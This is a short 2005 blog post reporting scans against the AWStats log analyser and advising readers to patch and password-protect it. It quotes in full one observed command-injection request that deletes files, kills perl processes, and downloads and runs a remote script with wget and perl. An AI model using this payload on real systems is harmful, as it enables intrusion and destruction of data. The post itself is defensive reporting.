Awstats exploits

By Roger on September 16, 2005 9:21 PM | | Comments (0)

SANS ISC highlighted awstats attacks today in the diary. I'm seeing the same sort of thing. Scans looking for

awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo|

I think that is a 9 month old awstats vuln. If you're running it you should patch it, and password protect the directory it is installed in.

Categories

General

Leave a comment

Powered by Ajax Comments

About this Entry

This page contains a single entry by Roger published on September 16, 2005 9:21 PM.

C & A Security was the previous entry in this blog.

You can't stop a virus is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.

Subscribe to feed Subscribe to this blog's feed
Add to Google
Please contact me by leaving a comment where appropriate. Otherwise, you can click here to reveal an email address for me.
Got Backups? Get Safe Online Remember Rick Rescorla Powered by Movable Type 4.2-en

Search